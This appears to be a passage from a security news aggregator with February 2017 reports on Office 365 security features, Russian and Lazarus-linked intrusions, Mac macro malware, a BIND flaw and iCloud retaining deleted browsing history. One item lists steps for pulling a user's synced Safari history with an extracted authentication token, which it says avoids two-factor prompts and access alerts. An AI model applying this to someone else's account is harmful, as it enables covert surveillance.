With the help of this new tool, customers will not only be able to understand their current Office 365 security configuration, but also to learn how implementing additional controls can improve their security and reduce risk, Rayani says.
Secure Score provides access to Score Analyzer via the Secure Score Summary. The Secure Score (or the numerator) is the sum of the points associated with the security configurations that a customer has adopted. The total score (or the denominator) is the sum of the points associated with all of the security controls available on the customer’s Office 365 plan.
The Score Analyzer allows customers to track and report their score over time. Customers are provided with access to a graph that shows their score on any date in the past, while also offering info on the specific actions they completed and which were available to them. The tool also offers support for exporting the score results to a CSV file for further use within an organization.
Secure Score also offers suggestions on possible actions that could improve one’s security position. These suggestions, Microsoft says, are prioritized depending on their effectiveness and impact to end users, meaning that those that are highly effective but have low impact on user experience are placed at the top.
The Office 365 Threat Intelligence, now in private preview, leverages the Microsoft Intelligent Security Graph to deliver actionable insights to global attack trends. The cost of data breaches is increasing, but even organizations that are properly prepared for a breach can diminish long-term costs.
The new Office 365 feature, Microsoft says, was designed to analyze data from global datacenters, Office clients, email, user authentications and other incidents and to deliver information about malware families inside and outside organizations, including breach information. Furthermore, it integrates with other Office 365 security features, including Exchange Online Protection and Advanced Threat Protection.
“Office 365 Threat Intelligence provides this visibility, along with rich insights and recommendations on mitigating cyber-threats, ultimately supporting a proactive defense posture, leading to long-term reduced organizational costs,” Rayani notes.
With the help of Office 365 Advanced Data Governance, customers can find and retain important data while eliminating redundant, obsolete and trivial data. By leveraging machine learning, it can deliver proactive policy recommendations; can classify data based by analyzing numerous factors, including data type, age, and user interaction; and can take action such as preservation or deletion.
According to Microsoft, this means that organizations have a better grasp of their data and no longer expose themselves to unnecessary risks because they retain data they no longer need, but which could be exposed in the event of a data breach.
While Office 365 Secure Score is now available to organizations with an Office 365 commercial subscription and which are in the multi-tenant and Office 365 U.S. Government Community clouds, Office 365 Threat Intelligence and Advanced Data Governance should become available by the end of March 2017 as part of the Office 365 Enterprise E5 plan and the Secure Productive Enterprise E5 offering.
DHS Uses Cyber Kill Chain to Analyze Russia-Linked Election Hacks
13.2.2017 securityweek Cyber
DHS Publishes Enhanced Analysis Report on GRIZZLY STEPPE Activity
The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) on Friday published a new report providing additional indicators of compromise (IOC) and analysis using the cyber kill chain to detect and mitigate threats from the Russia-linked "GRIZZLY STEPPE" hackers.
On Dec. 29, 2016, the DHS and FBI published an initial Joint Analysis Report (JAR) detailing the tools and infrastructure used by Russian hackers designated by DHS as “GRIZZLY STEPPE” in attacks against the United States election. The previous report, however, didn’t deliver on its promise, security experts argued.
While the original report included a series of IOCs, some said that they were of low quality, had limited utility to defenders, and were published as a political tool attempting to connect the attacks to Russia.
The new report is described by DHS as an Analytical Report (AR) providing a “thorough analysis of the methods threat actors use to infiltrate systems” in relation to the GRIZZLY STEPPE hackers. The report provides additional details on IOCs, along with analysis along phases of the cyber kill chain, and suggests specific mitigation techniques that could be used to counter GRIZZLY STEPPE attackers.
Utilizing the Cyber Kill Chain to Analyze GRIZZLY STEPPE
DHS analysts leveraged the Cyber Kill Chain framework created by Lockheed Martin that describes the phases of an attack. The report summarizes the activity of the campaign using each phase of the Cyber Kill Chain, which are Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on the Objective.
The report also provides detailed host and network signatures to help defenders detect and mitigate GRIZZLY STEPPE related activity, including additional YARA rules and IOCs associated with the attacks.
The DHS has previously said that two different actors participated in the political attacks, one in the summer of 2015, namely APT29, and the other in spring 2016, namely APT28. The former is also known as Cozy Bear, or CozyDuke, while the latter is referred to as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team.
DHS recommends that security teams read multiple bodies of work from various sources concerning GRIZZLY STEPPE.
“While DHS does not endorse any particular company or their findings, we believe the breadth of literature created by multiple sources enhances the overall understanding of the threat. DHS encourages analysts to review these resources to determine the level of threat posed to their local network environments,” the agency said.
Watering hole attacks on Polish Banks Linked to Lazarus Group
13.2.2017 securityweek Crime
According to security experts from Symantec and BAE Systems, the recently discovered attacks aimed at Poland banks are linked to the Lazarus Group.
Last week, several Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.
The cyber attack was first reported by the Zaufana Trzecia Strona, a local Polish news site on Friday, last week.
The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.
A spokesman for the KNF confirmed that internal systems of the regulator had been compromised by hackers “from another country”. The attackers dropped on the servers the malicious files that were used in the attacks against the Polish banks.
In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the KNF “in order to secure evidence.”
Lazarus Group Polish banks malware
The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.
At the time I was writing there is no evidence that attackers successfully stolen money from Polish banks or their customers, but some of the target organizations confirmed to have noticed large outgoing data transfers.
Both security firms BAE Systems and Symantec started their investigation on the attacks. According to Symantec, the threat actor behind the attack is the same that targeted financial organizations in 31 countries since at least October 2016.
According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.
The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.
This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.
The experts at Symantec have spotted in the past at least three strains of malware used by the group, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.
The attackers exploited “watering holes” in order to infect the machines of a specific audience with previously unknown malware.
“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.
Malware researchers at Symantec have identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. The attackers focused their activities on the banks, but the list of victims also includes ISPs and telecom operators.
“The attackers appear to be using compromised websites to redirect visitors to a customized exploit kit, which is preconfigured to only infect visitors from approximately 150 different IP addresses. These IP addresses belong to 104 different organizations located in 31 different countries. The vast majority of these organizations are banks, with a small number of telecoms and internet firms also on the list.” continues Symantec.”
Experts at Kaspersky have linked the group to the hacking operations Dark Seoul and Operation Troy. Kaspersky Lab, alongside with a number of security firms including Novetta, AlienVault, Invincea, ThreatConnect, Volexity, Symantec, and PunchCyber have published reports related to the activities of the Lazarus Group.
The group of security firms formed an alliance called Operation Blockbuster that issued the detection signatures to neutralize the hacking tools used by the APT.
In June 2016, the analysis of SWIFT attacks revealed five additional pieces of malware containing portions of code shared by Lazarus Group.
According to the analysis published by BAE Systems, one of the domains used in the Poland attack was also involved in a watering hole attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), the Mexican organization that is equivalent of Poland KNF.
“The eye-watch[.]in domain appears to have been used in watering-hole attacks on other financial sector websites. On 2016-11-08 we observed connections to the site referred from:
hxxp://www.cnbv.gob[.]mx/Prensa/Paginas/Sanciones.aspx
This is the page for the Comisión Nacional Bancaria y de Valores (National Banking and Stock Commission of Mexico), specifically the portion of their site that details sanctions made by the Mexican National Banking Commission. This organisation is the Mexican banking supervisor and the equivalent of Poland’s KNF.” reads the analysis published by BAE Systems.
Below the key findings of the analysis conducted by BAE Systems:
There has been a series of watering hole attacks on bank supervisor websites in Poland & Mexico, and a state owned bank in Uruguay in recent months. These leverage Silverlight and Flash exploits to deliver malware.
Investigators in Poland have identified known Lazarus group implants on bank networks and associated this with the recent compromise of the Polish Financial Supervision Authority’s website.
The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.
Give a look at both reports, they are full of information and also includes IoCs.
Survey Examines Cybersecurity Perception in U.S.
13.2.2017 securityaffairs Cyber
Survey Highlights Widely Divergent Views on State of Cyber Security in America
A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.
5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.
The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.
However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.
Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.
Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."
This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."
Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).
The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.
The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."
Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."
"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."
Malware Attacks on Polish Banks Linked to Lazarus Group
13.2.2017 securityweek Virus
Poland Bank Attacks Part of Bigger Campaign Targeting Over 100 Organizations
The recently discovered attacks aimed at banks in Poland appear to be part of a bigger campaign targeting financial organizations around the world, and researchers have found some links to the threat actor known as Lazarus.
BadCyber reported earlier this month that the systems of several Polish banks had been infected with a new piece of malware. The attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) and abused it to deliver malware to its visitors.
While there is no evidence that money has been stolen from banks or their customers, some of the organizations whose systems have been infected have noticed large outgoing data transfers.
Researchers at Symantec and BAE Systems have also analyzed the attack and determined that the custom exploit kit used by the attackers was configured to infect only visitors with certain IP addresses.
Symantec has identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. Most of the targeted organizations are banks, but the list of targets also includes telecoms and Internet companies. The IP addresses have been linked to banks in Poland, the U.S., Mexico, Brazil, Chile, Denmark, Venezuela, Colombia, the U.K., Peru and India.
The custom exploit kit was used to target Symantec customers in Poland, Mexico and Uruguay in attacks first spotted in October 2016.
The Polish website used as a watering hole delivered a piece of malware known to be part of the toolkit of the Lazarus Group. This threat actor, analyzed last year by several security firms, has been active since at least 2009 – possibly as early as 2007 – and it has conducted not only cyber espionage operations, but also attacks whose goal was to destroy data and disrupt systems.
Several high profile attacks have been attributed to the Lazarus Group, including the 2014 attack on Sony, and the Dark Seoul and Operation Troy campaigns. The actor has targeted government, military, media, aerospace, financial and manufacturing organizations primarily in South Korea and the United States.
Researchers also discovered links between Lazarus and an attack on a bank in the Philippines believed to have been carried out by the same cybercriminals that stole $81 million from Bangladesh’s Central Bank.
BAE Systems discovered that one of the domains used in the recent Poland watering hole attack was also involved in a similar attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), which is the Mexican equivalent of Poland’s KNF. The firm has also found evidence suggesting that the website of a state-owned bank in Uruguay had been targeted in a similar attack.
“The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear,” BAE Systems researchers said in a blog post. “However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.”
Word documents laced with malicious macros used to hack Apple Mac systems
13.2.2017 securityaffairs Apple
Crooks exploiting Word documents laced with malicious macros to compromise Apple Mac systems exactly in the same way they do with Microsoft machines.
It’s amazing the number of Apple Mac users that tell me their systems are immune from malware. This false sense of security is very dangerous and I believe it is important to explain how also Mac system could be compromised by malicious codes.
I want to take advantage by telling you about a recent event to explore the topic, crooks exploiting Word documents laced with malicious macros to compromise Apple Mac systems exactly in the same way they do with Microsoft machines.
Last week, security experts observed a spike in the distribution spam messages using attachments embedding malicious macros. One of the baits was titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm,” when the Mac recipients open the documents are prompted to enable macros.
Apple MAC
If a Mac user enabled the macros, the file executes a Python function that downloads a malicious payload and executes it infecting the machine. The Python code is publicly available, it is part of the open-source project EmPyre, and as highlighted by the researcher Patrick Wardle, this new attack leverages old tricks.
“Today, Monday the 6th, was a busy day for macOS malware! First, Nex (@botherder) posted a great writeup, iKittens: Iranian actor resurfaces with malware for mac (macdownloader)“, which detailed some new macOS malware. Shortly thereafter, my friend Scott (@0xdabbad00) brought to my attention the following tweet:
Segui
Snorre Fagerland @fstenv
#OSX #Macro #EmPyre "U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace" https://www.virustotal.com/en/file/07adb8253ccc6fee20940de04c1bf4a54a4455525b2ac33f9c95713a8a102f3d/analysis/ …
11:34 - 6 Feb 2017
9 9 Retweet 16 16 Mi piace
A malicious Word document targeting Mac users? I was intrigued :). I grabbed the sample (“U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm”), noting that only 4 AV engines currently flagged it as malicious”
The analysis of the attack revealed that the IP address used by crooks to spread the malware is located in Russia and was not new to researchers monitoring phishing campaigns.
The security researcher Patrick Wardle explained that the this Apple Mac Malware is not sophisticated, the attack needs the user interaction to compromise the machine.
The reliance on macros rather than a software vulnerability implies that the exploit can’t be blocked only by patching systems.
“Overall this malware sample isn’t particularly advanced. It relies on user interaction (to open a malicious document in Microsoft Word, (not Apple’s Pages)), as well as needs macros to be enabled. Most users know never to allow macros – right!?! Moreover using an open-source implant likely ensures that detection software should detect it – right!?” concluded Wardle.
“However let’s be nice and give the attackers some credit. By using a macros in Word document they are exploiting the weakest link; humans! And moreover since macros are ‘legitimate’ functionality (vs. say a memory corruption vulnerability) the malware’s infection vector doesn’t have to worry about crashing the system nor being ‘patched’ out. “
Recently the security researchers Claudio Guarnieri and Collin Anderson have analyzed samples of the MacDownloader malware that was disguised by nation-state hackers as a Flash Player update and a Bitdefender adware removal tool.
According to the researchers, the malware was first “poorly” developed the end of 2016, the experts noticed its code was copied from other sources. Anyway, at the time of writing the analysis, MacDownload is undetected by virus scanning engines on VirusTotal, while at the time I was writing just a dozen vendors have recognized the bogus Flash Player and Bitdefender apps as a threat.
This last case demonstrates that Apple MAC threat landscape is very active, for this reason, it is important awareness and a proper security posture for MAC users.
Při výběru EET by se měla zvážit i úroveň zabezpečení
13.2.2017 SecurityWorld Zabezpečení
Hackerské útoky na nezabezpečené systémy elektronické evidence tržeb (EET), ztráta nebo zneužití dat a z nich plynoucí penalizace a trestní stíhání - to jsou největší rizika nepromyšleného výběru řešení EET, jak je formulovala společnost eet1, jeden z tuzemských prodejců systémů EET.
Rizika jsou podle eet1 výrazně vyšší, než před jakými varovala nedávno Hospodářská komora (HK). Podle té hrozí řadě podnikatelů kvůli rychlému napojení na EET pokuty a bezpečnostní rizika, především sankce kvůli neplatným účtenkám podle zákona o účetnictví či za chybějící zákaznické displeje. HK též varovala před rizikem hackerského útoku na kasy a ztráty citlivých obchodních informací.
Jen necelé tři týdny zbývají do spuštění druhé vlny zavádění EET, která se týká maloobchodu a velkoobchodu. Přitom většina podnikatelů a firem stále neřeší, že od 1. prosince 2016 začal platit novelizovaný zákon o trestní odpovědnosti právnických osob (ZTOPO), podle kterého hrozí za porušení povinností ochrany osobních údajů milionové sankce a trestní stíhání.
Dále, od května 2018, navíc začne platit Obecné nařízení o ochraně osobních údajů (General Data Protection Regulation, GDPR), které tyto sankce zásadně zpřísňuje až na 20 milionů eur (nebo 4 % celkového celosvětového ročního obratu příslušné společnosti za předchozí účetní období).
„Tyto hrozby se týkají každého, kdo ochranu dat a osobních údajů podcení. Neznalostí zabezpečení kupovaného EET systému se podnikatelé vystavují neúměrnému riziku trestního stíhání,“ vysvětluje Klaus Hornitschek z eet1.
Uživatel podle něj nese plnou zodpovědnost za to, že ochrání data i jejich vkládání do systému nebo používaného zařízení před zneužitím.
„Je to podobné jako u platební karty, kdy si musí chránit PIN, měl by kartu používat s určitou opatrností a samozřejmě by měl pravidelně sledovat proběhlé transakce, zda mezi nimi není nějaká podvodná nebo podezřelá,“ dodává Jiří Berger, bezpečnostní expert eet1.
Turkish Man Sent to Prison in U.S. for $55M Cyber Heist
13.2.2017 securityaffairs Cyber
Turkish citizen Ercan Findikoglu, aged 35, was sentenced on Friday by a New York court to 8 years in prison for his leadership role in a cybercriminal organization that caused significant losses to banks worldwide.
Findikoglu, known online as “Segate,” “Predator” and “Oreon,” pleaded guilty in March to computer intrusion conspiracy, access device fraud conspiracy, and effecting transactions with unauthorized access devices. He faced nearly 58 years in prison.
According to authorities, between 2011 and 2013, the criminal gang Findikoglu was part of carried out three major campaigns that resulted in losses totaling more than $55 million.
The cybercrooks hacked into the systems of payment card processing companies, stole card data, including PINs, and eliminated withdrawal limits for those cards. The stolen card data was sent to other members of the group who encoded it onto the magnetic stripe of blank cards. The cards and their PINs were then distributed to a network of cashers who made thousands of fraudulent withdrawals at ATMs around the world.
In the first operation, which took place in February 2011, the fraudsters made 15,000 withdrawals in 18 countries, stealing roughly $10 million. In the next operation, in December 2012, they managed to steal approximately $5 million through 5,000 ATM transactions conducted in 20 countries.
The third and largest operation took place in February 2013, when the fraudsters withdrew roughly $40 million through 36,000 ATM transactions in 24 countries. Cashers in New York alone managed to obtain $2.4 million as a result of nearly 3,000 withdrawals.
Findikoglu was arrested in Germany in 2013 and extradited to the U.S. in 2015. Once he completes his prison sentence in the United States, he will be sent back to Turkey, where he has been sentenced to nearly 20 years in prison for payment card fraud.
The U.S. court that sentenced Findikoglu on Friday also ordered him to pay more than $55 million in restitution, but the New York Daily News reported that Turkish authorities seized all his assets and his current net worth is $150,000.
When they announced Findikoglu’s guilty plea back in March, U.S. authorities said they had already convicted dozens of other members of the cybercrime gang.
Apple uchovával smazaná data z iCloudu
13.2.2017 SecurityWorld Apple
Společnost Elcomsoft si všimla, že Apple ukládá historii vyhledávání, kterou už uživatelé smazali. Jak závažný může být pro uživatele tento problém? Zdá se, že iCloud od Applu uchovává i více než rok starou internetovou historii vyhledávání, kterou už uživatelé dávno smazali. Na možnou kauzu upozornila ruská společnost Elcomsoft, která z iCloudových účtů dokázala vytáhnout údajně smazanou historii vyhledávání skrz prohlížeč Safari, včetně dat a časů, kdy uživatelé konkrétní stránky navštívili a kdy následně záznamy smazali.
„Byli jsme schopni dostat se k záznamům, které byly víc jak rok staré,“ uvádí Vladimir Katalov, šéf Elcomsoftu.
Uživatelé iCloudu si mohou uchovávání historie nastavit tak, aby ji měli přístupnou ze všech svých zařízení. Rusové však zjistili, že i když ji uživatel vymaže, iCloud ji zcela neodstraní, ale místo toho ji dál uchovává ve formátu, který už ale uživatel nevidí.
Uchovávání kopie takových záznamů může být podle Katalova „neocenitelné pro výzvědné a vyšetřovací služby“, nicméně dodává, že není zcela jasné, zda Apple o tom, že iCloud smazaná data uchovává, vůbec věděl.
Jakmile totiž Elcomsoft na záležitost upozornil, Apple začal z iCloudu dotčené záznamy odstraňovat, aniž by se však k objevu jakkoliv vyjádřil. „Ale možná je jen přesouvají na jiné servery, aby se k nim už zvenku nešlo dostat,“ dodává Katalov, podle něhož už se jeho lidé dostali pouze k záznamům starým dva týdny.
Není to přitom poprvé, co Elcomsoft upozornil na možný prohřešek Applu. V minulosti zjistil, že iCloud ukládá rovněž uživatelskou historii hovorů bez toho, aby uživateli nabídl možnost tuto synchronizaci vypnout.
Na to Apple tehdy reagoval tím, že jde o funkci pro zajištění většího pohodlí, umožňující uživatelům zpětná volání z kteréhokoliv ze svých zařízení. Vedle toho, synchronizaci ukládání historie prohlížení, mohou uživatelé obávající se o své soukromí, alespoň vypnout.
Search engine companies will ban links published by major torrent hubs
13.2.2017 securityaffairs IT
Starting from June 1st search engine companies will block queries to links to pirated content, including films, TV shows, and copyright-protected content.
It will be even more difficult to search for torrents of ExtraTorrent, KickassTorrents, The Pirate Bay and equivalent services.
In the past copyright holders accused the search engine companies of doing too little to ban infringing links.
There have even been rumors that the new legislation could force search engine companies adopting drastic measures on tackling piracy.
Starting from June 1st, the major search engine will block any queries searching for specific pirated torrent files.
It will be not possible to find links to pirated content, including films, games, TV shows, music and copyright-protected content. The search engine companies have joined the efforts in the fight against online piracy.
The UK’s Intellectual Property Office is working with search engine companies and entertainment firms to reach an agreement to adopt a series of measured to tackle the piracy.
“Google and other search companies are close to striking a voluntary agreement with entertainment companies to tackle the appearance of infringing content links in search results.” reads a blog post published by TorrentFreak. “Following roundtable discussions chaired by the UK’s Intellectual Property Office, all parties have agreed that the code should take effect by June 1, 2017.”
The UK government has played a crucial role in reaching an agreement between the search engine giants and entertainment firms, it seems that the parties are “extremely close” to sign an agreement.
“The search engines involved in this work have been very co-operative, making changes to their algorithms and processes, but also working bilaterally with creative industry representatives to explore the options for new interventions, and how existing processes might be streamlined,” said the parliamentary Baroness Buscombe.
“I understand that all parties are keen to finalize and sign up to the voluntary agreement, and so we believe there is no need to take a legislative power at this time.”
“All parties have also agreed that the code should take effect, and the targets in it be reached, by 1 June this year,” Baroness added.
It will be very interesting to see how such kind of agreement reached in the UK could be effective overseas.
A new serious DOS flaw affects BIND DNS software, updates it now
12.2.2017 securityaffairs Attack
A new serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
A security serious denial-of-service (DoS) vulnerability, tracked as CVE-2017-3135, was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
The vulnerability in the BIND DNS software was reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox.
The DoS flaw affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases, and all 9.11 version.
The flaw has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3.
The flaw, rated as “high severity” (CVSS score of 7.5), is remotely exploitable in the case of servers uses certain configurations.
“Some configurations using both DNS64 and RPZ can lead to an INSIST assertion failure or a NULL pointer read; in either case named will terminate.” reads the advisory published by the ISC
“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer,”
Only servers utilizing both DNS64 and RPZ at the same time are potentially vulnerable.
“When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.
The advisory suggests to update each vulnerable installation, it also includes possible workarounds such as removing either DNS64 or RPZ from the configuration, or restricting the contents of the policy zone.
In January 2017, the Internet Systems Consortium (ISC) has issued updates to solve four high severity flaws in the DNS software BIND. The flaw could be exploited by a remote attacker to cause a DoS condition.
An attacker can exploit the vulnerabilities to cause the BIND name server process to encounter an assertion failure and stop executing.
Apple’s iCloud saved the deleted Safari browsing history over the years
12.2.2017 securityaffairs Apple
According to the Russian forensic firm Elcomsoft the Apple iCloud saved deleted Safari browsing history over the years open the door to surveillance.
According to digital forensics firm Elcomsof, Apple iCloud maintained deleted internet Safari browsing history over the years. The experts at Elcomsof discovered the issue while trying to extract records from iCloud accounts, they were able to retrieve supposedly deleted Safari browser histories from the accounts. The researchers were able to pull information such as the date and time the website was visited and when the record was deleted.
Safari history is synced across the devices used by a specific iCloud account. When the user deletes a record on one device, it will disappear on all other devices in a few seconds when the devices are connected to the Internet.
Users can set iCloud to store their browsing history, in this way it will be available from all the user’s connected devices. The researchers discovered that even if the user deletes the history, iCloud doesn’t actually erase it but keeps it in a format invisible to the user.
“However, those same records will be kept in Apple iCloud for much longer. In fact, we were able to access records dated more than one year back. The user does not see those records and does not know they still exist on Apple servers.” reads a blog post published by the Elcomsoft’s CEO Vladimir Katalov.
“In fact, we were able to access records dated more than one year back,”
The experts used the Elcomsoft Phone Breaker forensic tool to extract files from an iCloud account.
How does it work?
In order to extract Safari history from iCloud it is necessary to be authenticated into the user’s Apple ID. The operation can be carried on using login credentials or by using an authentication token extracted from the user’s computer. The authentication tokens are automatically created by iCloud Control Panel on Windows and Mac computers that were synced with iCloud.
The Elcomsoft Phone Breaker can be used by experts to extract iCloud authentication tokens.
“By using the token to log in, you’ll bypass both the password and the secondary authentication prompt if two-factor authentication is enabled on the user’s account. As a result, iCloud access alert will not be delivered to the user.” states the post.
Below the procedure to extract Safari browsing history from iCloud with Elcomsoft Phone Breaker:
Launch Elcomsoft Phone Breaker 6.40 or newer
Click “Download Synced Data from iCloud”
Authenticate with Apple ID/password or binary authentication token
Specify everything you’d like to download. Make sure to check “Safari”
Safari browsing history
The forensic implication of the discovery is serious because it implies the possibility to conduct surveillance activity as explained in the post.
“Forensic use of synced data is hard to underestimate. Unlike cloud backups that are created daily at best, iCloud sync works nearly in real-time. Being able to track suspect’s activities almost no delay can be invaluable for surveillance and investigations.” states Katalov.
“Since deleting browsing history from iCloud is nearly impossible for the user, discovering illicit activities becomes much easier. Experts will be able to recover visits to extremist and other illicit Web sites even if the suspect deletes their browser history or wipes their iPhone.”
Keeping a copy of a user’s browser history can certainly be “invaluable for surveillance and investigations,” Katalov said. But it’s unclear if Apple knew that its iCloud service was storing the deleted records.
Apple didn’t immediately respond to a request for comment, but experts from Elcomsoft noticed that after they disclosed the issue, Apple started “purging” older browser history records from iCloud.
“we have informed media about this issue in advance, and they reached Apple for comments. As far as we know, Apple has not responded, but started purging older history records. For what we know, they could be just moving them to other servers, making deleted records inaccessible from the outside; but we never know for sure. Either way, as of right now, for most iCloud accounts we can see history records for the last two weeks only (deleted records for those two weeks are still there though).” states the blog post. But now only deleted records as old as only two weeks can be extracted, the forensic company said.
Elcomsoft suggests disabling the syncing of Safari browsing history from iCloud.
A US minor is behind the cyber attack that hit Brussels airport after bombings
12.2.2017 securityaffairs Cyber
Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after 2016 bombings was launched by a US minor.
Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after dramatic 2016 bombings in Belgium’s capital was launched by a US minor.
On March 2016, suicide bombers attacked Zaventem airport and a metro station in the Belgium capital causing Thirty-two people died.
“Many more were injured in the attacks. The toll did not include three bombers who died. So-called Islamic State said it was behind the attacks.” reported the BBC.
The US youngster, a 14 years old based in Pittsburgh, has admitted having launched a cyber attack on the systems at the Brussels airport.
The young hacker launched a cyber attack against the airport’s computer system on the night of 22-23 March 2016, but the cyber incursion failed.
“In a statement on Thursday, Belgium’s federal prosecutors say the attempt to take down Zaventem’s website and hack into the airport’s computer system on the night of 22-23 March 2016 was unsuccessful.” continues the BBC.
The Belgium authorities conducted a joint investigation with the FBI that allowed them to identify the US minor, who “confessed having committed the acts”.
The cyber attack has “no terrorist motives” and according to prosecutors, it was not related to the Brussel bombings.
According to the prosecutors, the FBI identified and interrogated a minor of American nationality who “confessed having committed the acts”.
“From the investigation and the first analyses of the seized hardware it appeared that there were no terrorist motives,” the statement added.
The prosecutors say avoided to disclose further information on the case because the investigation is ongoing.
Let me close with an observation on the case:
The lack of perception for a cyber crime. The vast majority of youngsters hack out of boredom or to satisfy their egos, but completely ignores the consequences of a cyber attack. These attacks can have serious consequences, especially in conjunction with tragic events such as those that occurred in Brussels. It is necessary to instill awareness in young people and stimulate debate on cyber issues.
Youngsters could be easily manipulated by threat actors (i.e. terrorists, nation-state actors, cyber criminals) and we cannot underestimate the effectiveness of their activities in the cyber space. Young guys are precious resources for the modern society, but unaware boys could represent a dangerous threat.
DDoS attacks in Q4 2016
12.2.2017 Kaspersky Attack
Without doubt, 2016 was the year of Distributed Denial of Service (DDoS) with major disruptions in terms of technology, attack scale and impact on our daily life. In fact, the year ended with massive DDoS attacks unseen before, leveraging Mirai botnet technology, whose first appearance was covered in our last DDoS Intelligence Report.
Since then, we have published several other detailed reports dedicated to major attacks on Dyn’s Domain Name System (DNS) infrastructure, on Deutsche Telekom, which knocked 900K Germans offline in November. Additionally, we tracked similar attacks on Internet service providers (ISPs) in Ireland, the United Kingdom and Liberia all leveraging IoT devices controlled by Mirai technology and partly targeting home routers in an attempt to create new botnets.
Although ‘Rise of the Machines‘, as the Institute for Critical Infrastructure Technology (ICIT) titled its analysis, sounds quite blatant, it clearly shows that stakeholders worldwide, in particular in the United States and the European Union, recognize the lack of security inherent in the functional design of IoT devices and the need to set up a common IoT security ecosystem. And not before time, as we expect to see the emergence of further Mirai botnet modifications and a general increase in IoT botnet activity in 2017.
